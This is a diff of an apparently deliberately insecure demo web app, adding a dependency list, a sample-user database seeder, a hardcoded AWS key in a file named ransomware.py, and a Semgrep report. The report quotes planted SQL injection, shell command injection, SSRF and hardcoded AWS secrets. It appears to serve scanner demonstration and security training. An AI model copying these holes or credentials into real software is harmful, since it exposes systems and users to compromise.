+ "ref": "pkg:pypi/llvmlite@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/lmdb@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/locket@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/lz4@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/markdown-it-py@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/matplotlib@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/matplotlib-inline@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/mccabe@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/mdit-py-plugins@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/mdurl@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/mistune@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/mkl-fft@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/mkl-random@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/mkl-service@2.4.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/more-itertools@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/mpmath@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/msgpack@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/multidict@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/multipledispatch@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/multiprocess@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/munkres@1.1.4", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/mypy-extensions@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/navigator-updater@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/nbclassic@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/nbclient@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/nbconvert@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/nest-asyncio@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/networkx@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/nltk@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/notebook@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/notebook-shim@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/numba@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/numexpr@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/numpydoc@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/openpyxl@3.0.10", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pandas@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pandocfilters@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/panel@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/param@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/parso@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/partd@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pathlib@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pathspec@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/patsy@0.5.3", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pep8@1.7.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pexpect@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pickleshare@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pkginfo@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/platformdirs@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/plotly@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pluggy@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/ply@3.11", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/poyo@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/prometheus-client@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/prompt-toolkit@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/psutil@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/ptyprocess@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pure-eval@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/py-cpuinfo@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyarrow@11.0.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyasn1@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pycodestyle@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pycosat@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pycparser@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyct@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pycurl@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pydocstyle@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyerfa@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyflakes@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pylint@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pylint-venv@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyls-spyder@0.4.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyodbc@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyparsing@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyrsistent@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pytest@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/python-json-logger@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/python-lsp-black@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/python-lsp-jsonrpc@1.0.0", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/python-lsp-server@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/python-slugify@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/python-snappy@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pytoolconfig@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyviz-comms@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyxdg@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/pyzmq@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/qstylizer@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/qtconsole@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/regex@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/requests-file@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/requests-toolbelt@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/responses@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/rfc3339-validator@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/rfc3986-validator@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/rope@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/ruamel.yaml@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/ruamel-yaml-conda@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/s3fs@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/safetensors@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/scikit-image@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/scikit-learn@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/scikit-learn-intelex@20230426.111612", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/scipy@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/seaborn@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sip@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/smart-open@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sniffio@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sortedcontainers@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/soupsieve@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/spyder@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/spyder-kernels@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/stack-data@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/statsmodels@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/sympy@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tables@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tabulate@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tblib@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tenacity@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/terminado@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/text-unidecode@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/textdistance@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/threadpoolctl@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/three-merge@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tifffile@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tinycss2@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tokenizers@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/toml@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tomlkit@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/toolz@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tornado@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tqdm@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/traitlets@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/transformers@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/typing-extensions@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/tzdata@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/uc-micro-py@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/ujson@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/watchdog@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/wcwidth@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/webencodings@0.5.1", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/websocket-client@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/werkzeug@3.0.3", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/whatthepatch@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/widgetsnbextension@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/wurlitzer@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/xarray@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/xxhash@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/xyzservices@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/y-py@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/yapf@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/yarl@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/ypy-websocket@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/zict@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/zipp@latest", + "dependsOn": [] + }, + { + "ref": "pkg:pypi/zstandard@latest", + "dependsOn": [] + } + ] +} \ No newline at end of file diff --git a/insecure-app/data/tutorial.db b/insecure-app/data/tutorial.db new file mode 100644 index 0000000..9bff466 Binary files /dev/null and b/insecure-app/data/tutorial.db differ diff --git a/insecure-app/init_db.py b/insecure-app/init_db.py new file mode 100644 index 0000000..31c8af5 --- /dev/null +++ b/insecure-app/init_db.py @@ -0,0 +1,30 @@ +import sqlite3 + +# Create the database file +db = sqlite3.connect("tutorial.db") +cursor = db.cursor() + +# Create the users table +cursor.execute(""" + CREATE TABLE IF NOT EXISTS users ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + username TEXT NOT NULL, + password TEXT NOT NULL + ) +""") + +# Insert some sample data +users = [ + ('admin', 'password123'), + ('user1', 'letmein'), + ('user2', 'qwerty'), + ('jdoe', 'securepass'), +] + +cursor.executemany("INSERT INTO users (username, password) VALUES (?, ?)", users) +db.commit() + +print("Database initialized with sample data.") + +# Close the connection +db.close() diff --git a/insecure-app/ransomware.py b/insecure-app/ransomware.py index 1366431..1baa853 100644 --- a/insecure-app/ransomware.py +++ b/insecure-app/ransomware.py @@ -31,6 +31,7 @@ class RansomWare: def __init__(self): + aws = "AKIA2JAPX77RGLB664VE" # Key that will be used for Fernet object and encrypt/decrypt method self.key = None # Encrypt/Decrypter diff --git a/insecure-app/requirements.txt b/insecure-app/requirements.txt index 57fe178..c28697a 100644 --- a/insecure-app/requirements.txt +++ b/insecure-app/requirements.txt @@ -1,4 +1,6 @@ requests == 2.19.1 cryptography==3.3.2 flask==3.0.2 -#cryptograpy==3.3.2 \ No newline at end of file +#cryptograpy==3.3.2 +lxml==4.9.3 +Werkzeug==3.0.1 \ No newline at end of file diff --git a/insecure-app/semgrep.sarif b/insecure-app/semgrep.sarif new file mode 100644 index 0000000..a258da8 --- /dev/null +++ b/insecure-app/semgrep.sarif @@ -0,0 +1 @@ +{"version":"2.1.0","runs":[{"invocations":[{"executionSuccessful":true,"toolExecutionNotifications":[{"descriptor":{"id":"Syntax error"},"level":"warning","message":{"text":"Syntax error at line Dockerfile:26:\n `-m` was unexpected"}}]}],"results":[{"fingerprints":{"matchBasedId/v1":"dada070a930ff6915e010e14faf3e2a544c5bfef11d4b3951579186b45fd276654de79517b73e6e5a002f42a307856fa25340d962b684c05bc721125b161c6a4_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"Dockerfile","uriBaseId":"%SRCROOT%"},"region":{"endColumn":31,"endLine":34,"snippet":{"text":"CMD [\"python3\", \"/app/app.py\"]"},"startColumn":1,"startLine":34}}}],"message":{"text":"By not specifying a USER, a program in the container may run as 'root'. This is a security hazard. If an attacker can control a process running as root, they may have control over the container. Ensure that the last USER in a Dockerfile is a USER other than 'root'."},"properties":{},"ruleId":"dockerfile.security.missing-user.missing-user"},{"fingerprints":{"matchBasedId/v1":"d3f90f0252b984381d71020b1e2de08076320938a41a49580bbd203f298f8924a77c7deb99583af188f3e92bcf0ba4170d3026fcb83cd6c80f3d364335943b74_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":42,"endLine":9,"snippet":{"text":"aws_access_key_id = 'AKIA2JAPX77RGLB664VE'"},"startColumn":22,"startLine":9}}}],"message":{"text":"AWS Access Key ID Value detected. This is a sensitive credential and should not be hardcoded here. Instead, read this value from an environment variable or keep it in a separate, private file."},"properties":{},"ruleId":"generic.secrets.security.detected-aws-access-key-id-value.detected-aws-access-key-id-value"},{"fingerprints":{"matchBasedId/v1":"62b677a9ac8db6b43698e08bb8999af71ccf425e8f0bff29ebd6d04d357de968d3486bc87efd30adafb5715e2fc50afc02af5e3aeefc061f7a7bd48118f11e6d_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":56,"endLine":10,"snippet":{"text":"aws_secret = 'v5xpjkWYoy45fGKFSMajSn+sqs22WI2niacX9yO5'"},"startColumn":1,"startLine":10}}}],"message":{"text":"AWS Secret Access Key detected"},"properties":{},"ruleId":"generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key"},{"fingerprints":{"matchBasedId/v1":"c27ee0733289c4c6cab7973d5eef3441b06349f989c97c962ad422daa774c4f24ca734f3dac7a09ea8071ca2821feb97358d2218c9dcc6901b05b1237b526ef8_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":111,"endLine":23,"snippet":{"text":" cursor.execute(\"SELECT * FROM users WHERE username = '%s' AND password = '%s'\" % (username, password))"},"startColumn":9,"startLine":23}}}],"message":{"text":"Detected possible formatted SQL query. Use parameterized queries instead."},"properties":{},"ruleId":"python.lang.security.audit.formatted-sql-query.formatted-sql-query"},{"fingerprints":{"matchBasedId/v1":"4cc77d72d38f54fe170b2df9e3112e9c54643fe60832c2241bdd5680038b5cd1411cf25a77591b0e1b722c572cdd92d0afdeb6e0c13cc8fb85789e6c3c226f7b_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":111,"endLine":23,"snippet":{"text":" cursor.execute(\"SELECT * FROM users WHERE username = '%s' AND password = '%s'\" % (username, password))"},"startColumn":9,"startLine":23}}}],"message":{"text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better option."},"properties":{},"ruleId":"python.sqlalchemy.security.sqlalchemy-execute-raw-query.sqlalchemy-execute-raw-query"},{"fingerprints":{"matchBasedId/v1":"49f6aed9240ede5a9e7feb0e6e40f55df5b780a6372ad341ee616496f198d6b47cf69bf2a19f88e6b8751c9d09b21e2798a497977c189508c0abe35302901c55_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":104,"endLine":31,"snippet":{"text":" process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)"},"startColumn":23,"startLine":31}}}],"message":{"text":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands."},"properties":{},"ruleId":"python.flask.security.injection.subprocess-injection.subprocess-injection"},{"fingerprints":{"matchBasedId/v1":"d4967e520ffee3bd1e1502484b19070a6e023982fd9a29e6f7e1eb822be84f8cfea6f30279b196875ac11f243eabffc9ba5d8660b157605ec74f5b274f8fda96_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":43,"endLine":31,"snippet":{"text":" process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)"},"startColumn":40,"startLine":31}}}],"message":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"properties":{},"ruleId":"python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array"},{"fingerprints":{"matchBasedId/v1":"bb6dc649e4b6ee5509771d3452faed0c30a6c27c881a6599efeaacac0b7828d43e783373c48277959bca6741d63f283d024732acb6a02c97b033c57ca2c36303_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":43,"endLine":31,"snippet":{"text":" process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)"},"startColumn":40,"startLine":31}}}],"message":{"text":"Detected subprocess function 'Popen' with user controlled data. A malicious actor could leverage this to perform command injection. You may consider using 'shlex.escape()'."},"properties":{},"ruleId":"python.lang.security.dangerous-subprocess-use.dangerous-subprocess-use"},{"fingerprints":{"matchBasedId/v1":"f1bdca96719f423a6ea58be7316752be10df105bce0e1d6040b54139e920a6681492d045a4fe1e77c9c8934895db01f305dfe26abb0bd38e4e6dc9d6498de221_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":55,"endLine":31,"snippet":{"text":" process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)"},"startColumn":51,"startLine":31}}}],"message":{"text":"Found 'subprocess' function 'Popen' with 'shell=True'. This is dangerous because this call will spawn the command using a shell process. Doing so propagates current shell settings and variables, which makes it much easier for a malicious actor to execute commands. Use 'shell=False' instead."},"properties":{},"ruleId":"python.lang.security.audit.subprocess-shell-true.subprocess-shell-true"},{"fingerprints":{"matchBasedId/v1":"aa6a6a1337d4b8583d9a4ef1c1d5dbf92a4aabe2ca75cb82308327cd876bd8b37b33c92441727ce39defe317ac12d31cd8aebdaa8dabdf2100b0a167338a7230_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":43,"endLine":58,"snippet":{"text":" sql = request.form['sql']\n try:\n # Execute the user's SQL query\n cursor.execute(sql)\n # Fetch all rows from the query result\n rows = cursor.fetchall()\n # Format the results for display\n if rows:\n output = \"Results:\\n\" + \"\\n\".join(str(row) for row in rows)\n else:\n output = \"Query executed successfully, but no results found.\"\n except Exception as e:\n output = f\"SQL Error: {e}\""},"startColumn":13,"startLine":46}}}],"message":{"text":"User-controlled data from a request is passed to 'execute()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use django's QuerySets, which are built with query parameterization and therefore not vulnerable to sql injection. For example, you could use `Entry.objects.filter(date=2006)`."},"properties":{},"ruleId":"python.django.security.injection.sql.sql-injection-using-db-cursor-execute.sql-injection-db-cursor-execute"},{"fingerprints":{"matchBasedId/v1":"a04109a3fba2bec9bba9a69c8a18decc6bbc241dc522f296413da43fc4115e4aa7a34f119eb919fee4b6f6658f6db48e751646b6a52bfcb26d2b2b5f622f6918_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":35,"endLine":49,"snippet":{"text":" cursor.execute(sql)"},"startColumn":32,"startLine":49}}}],"message":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. The driver API has the ability to bind parameters to the query in a safe way. Make sure not to dynamically create SQL queries from user-influenced inputs. If you cannot avoid this, either escape the data properly or create an allowlist to check the value."},"properties":{},"ruleId":"python.flask.db.generic-sql-flask.generic-sql-flask"},{"fingerprints":{"matchBasedId/v1":"21a28e34c6a4a89addad1d3b41ce8fa27db59fa080e77f51c86f7ccbd2e154859ae532f29680b7cd32ea994e7ea2ebca35559cac3ef7223241e922daec6ab5b3_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":44,"endLine":83,"snippet":{"text":" url = request.form['url']\n try:\n response = requests.get(url)\n output = f\"SSRF Response: {response.text[:200]}\"\n except Exception as e:\n output = f\"SSRF Error: {e}\""},"startColumn":13,"startLine":78}}}],"message":{"text":"Data from request object is passed to a new server-side request. This could lead to a server-side request forgery (SSRF). To mitigate, ensure that schemes and hosts are validated against an allowlist, do not forward the response to the user, and ensure proper authentication and transport-layer security in the proxied request. See https://owasp.org/www-community/attacks/Server_Side_Request_Forgery to learn more about SSRF vulnerabilities."},"properties":{},"ruleId":"python.django.security.injection.ssrf.ssrf-injection-requests.ssrf-injection-requests"},{"fingerprints":{"matchBasedId/v1":"bf2d23131cd5fd3f3cb07b60a46079e066b555ec0b5a8fb9dd402f373371db1303f456795711b6cf30a37596f7e724e856e4abe27b9550da6ceb4e1f288e3ecd_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":45,"endLine":80,"snippet":{"text":" response = requests.get(url)"},"startColumn":28,"startLine":80}}}],"message":{"text":"Data from request object is passed to a new server-side request. This could lead to a server-side request forgery (SSRF). To mitigate, ensure that schemes and hosts are validated against an allowlist, do not forward the response to the user, and ensure proper authentication and transport-layer security in the proxied request."},"properties":{},"ruleId":"python.flask.security.injection.ssrf-requests.ssrf-requests"},{"fingerprints":{"matchBasedId/v1":"bf73be1a5fa3bae4e6e99df92be605d0698ed099a89fe8b07c2a1b6f08215d9c15c91c3ea9cf416e0dc2cb5c34fbd37f8fa0f4fc65895e8c2c6c75e4799687d0_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":44,"endLine":80,"snippet":{"text":" response = requests.get(url)"},"startColumn":41,"startLine":80}}}],"message":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"properties":{},"ruleId":"python.flask.net.tainted-flask-http-request-requests.tainted-flask-http-request-requests"},{"fingerprints":{"matchBasedId/v1":"21a6ce4274d15c4f5211ba704eda2ca0192bd59500d031fd0a0af826191fcba32c0f0dc06da42363557294ec61fb0e7eb5a825ef83fc6cf86095d98ea11adc00_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":43,"endLine":98,"snippet":{"text":" username = request.form['username']\n try:\n # Vulnerable SQL query using string interpolation\n query = \"SELECT password FROM users WHERE username = '{}'\".format(username)\n cursor.execute(query)\n result = cursor.fetchone()\n if result:\n output = f\"Password for {username}: {result[0]}\"\n else:\n output = \"User not found.\"\n except Exception as e:\n output = f\"SQL Error: {e}\""},"startColumn":13,"startLine":87}}}],"message":{"text":"User-controlled data from a request is passed to 'execute()'. This could lead to a SQL injection and therefore protected information could be leaked. Instead, use django's QuerySets, which are built with query parameterization and therefore not vulnerable to sql injection. For example, you could use `Entry.objects.filter(date=2006)`."},"properties":{},"ruleId":"python.django.security.injection.sql.sql-injection-using-db-cursor-execute.sql-injection-db-cursor-execute"},{"fingerprints":{"matchBasedId/v1":"f779f175ee6b7b343aeff851a6779e7e8abd395d59494bc86cf6288f0e171f6af0be47af0467077ecd98684b16d2abd381c89ceffd024a2a7bb05707c953d34a_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":92,"endLine":90,"snippet":{"text":" query = \"SELECT password FROM users WHERE username = '{}'\".format(username)"},"startColumn":25,"startLine":90}}}],"message":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using the Django object-relational mappers (ORM) instead of raw SQL queries."},"properties":{},"ruleId":"python.django.security.injection.tainted-sql-string.tainted-sql-string"},{"fingerprints":{"matchBasedId/v1":"0991f39759cd6eaae196a0c5c1ad78e29a0e52f2fb2aee11ab2cd4637b0f1873dcd6d89357e546906a00b6701487b0d44ac6a43f42a83ce8656e50e09cba301e_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":92,"endLine":90,"snippet":{"text":" query = \"SELECT password FROM users WHERE username = '{}'\".format(username)"},"startColumn":25,"startLine":90}}}],"message":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries."},"properties":{},"ruleId":"python.flask.security.injection.tainted-sql-string.tainted-sql-string"},{"fingerprints":{"matchBasedId/v1":"e7f07ab694370e0eb238a16cea03b2e5519c25b00350c03acbf78ba3ae01dc80a1da5cac87dab27c3945301940250759ba11018e62a21d5c7a3c123fadda48dd_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":38,"endLine":91,"snippet":{"text":" cursor.execute(query)"},"startColumn":17,"startLine":91}}}],"message":{"text":"Detected possible formatted SQL query. Use parameterized queries instead."},"properties":{},"ruleId":"python.lang.security.audit.formatted-sql-query.formatted-sql-query"},{"fingerprints":{"matchBasedId/v1":"8261599cc1ac432fa3e1bf25d74e4090d52edca4feef0492c951208767ab0dc4f11719b16b1c39c5f4c78bedb7abba94608bdfb1b14a5cc7fcd161afdcf05442_0"},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"app.py","uriBaseId":"%SRCROOT%"},"region":{"endColumn":38,"endLine":91,"snippet":{"text":" cursor.execute(query)"},"startColumn":17,"startLine":91}}}],"message":{"text":"Avoiding SQL string concatenation: untrusted input concatenated with raw SQL query can result in SQL Injection. In order to execute raw query safely, prepared statement should be used. SQLAlchemy provides TextualSQL to easily used prepared statement with named parameters. For complex SQL composition, use SQL Expression Language or Schema Definition Language. In most cases, SQLAlchemy ORM will be a better 